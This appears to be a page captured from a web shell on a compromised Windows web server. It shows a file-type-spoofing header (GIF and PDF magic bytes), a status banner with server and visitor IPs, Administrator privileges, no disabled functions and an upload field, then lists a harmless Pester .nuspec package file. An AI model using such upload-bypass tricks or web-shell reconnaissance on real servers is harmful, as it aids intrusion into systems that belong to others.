GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Program Files (x86)/WindowsPowerShell/Modules/Pester/3.4.0/ |
Upload File : |
<?xml version="1.0"?> <package xmlns="http://schemas.microsoft.com/packaging/2010/07/nuspec.xsd"> <metadata> <id>Pester</id> <version>$version$</version> <title>Pester</title> <summary>A BDD style testing tool for Powershell</summary> <description>Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.</description> <tags>powershell unit testing bdd tdd mocking admin</tags> <authors>Pester Team</authors> <iconUrl>http://pesterbdd.com/images/Pester.png</iconUrl> <projectUrl>https://github.com/Pester/Pester</projectUrl> <licenseUrl>http://www.apache.org/licenses/LICENSE-2.0.html</licenseUrl> </metadata> <files> <file src="Pester.psm1" target="$targetBase$" /> <file src="Pester.psd1" target="$targetBase$" /> <file src="Pester.Tests.ps1" target="$targetBase$" /> <file src="LICENSE*" target="$targetBase$" /> <file src="chocolateyInstall.ps1" /> <file src="nunit_schema_2.5.xsd" target="$targetBase$" /> <file src="bin\*.*" target="$targetBase$\bin" /> <file src="Examples\**\*.*" target="$targetBase$\Examples" /> <file src="Functions\**\*.*" target="$targetBase$\Functions" /> <file src="Snippets\*.*" target="$targetBase$\Snippets" /> <file src="en-US\*.*" target="$targetBase$\en-US" /> </files> </package>